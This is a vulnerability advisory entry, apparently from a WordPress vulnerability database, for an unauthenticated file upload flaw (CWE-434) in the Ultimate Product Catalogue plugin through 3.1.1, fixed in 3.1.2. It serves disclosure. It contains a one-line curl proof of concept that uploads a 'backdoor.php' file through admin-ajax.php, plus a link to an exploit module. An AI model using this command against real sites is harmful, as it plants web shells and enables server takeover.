Ultimate Product Catalogue <= 3.1.1 - Unauthenticated File Upload
Description
By sending a specially crafted HTTP POST request, a remote unauthenticated attacker can exploit this issue to upload arbitrary files and execute them in the context of the web server process.
Proof of Concept
curl -v -k -X POST -F "Products_Spreadsheet=@./backdoor.php" "www.example.com/wp-admin/admin-ajax.php?action=widgets_init&Action=UPCP_AddProductSpreadsheet"

Affects Plugin

Ultimate Product Catalogue, fixed in version 3.1.2

References

URL http://blog.seeweb.it/wordpress-ultimate-product-catalogue-vulnerability
URL https://github.com/espreto/wpsploit/blob/master/modules/exploits/unix/webapp/wp_ultimate_product_catalogue_file_upload.rb

Classification

Type UPLOAD
CWE CWE-434

Miscellaneous

Submitter Luca Ercoli
Submitter Website http://blog.seeweb.it/
Submitter Twitter seeweblive
Views 4496
Verified No
WPVDB ID 7939

Timeline

Publicly Published 2015-04-22 (about 5 years ago)
Added 2015-04-26 (about 5 years ago)
Last Updated 2019-10-25 (8 months ago)
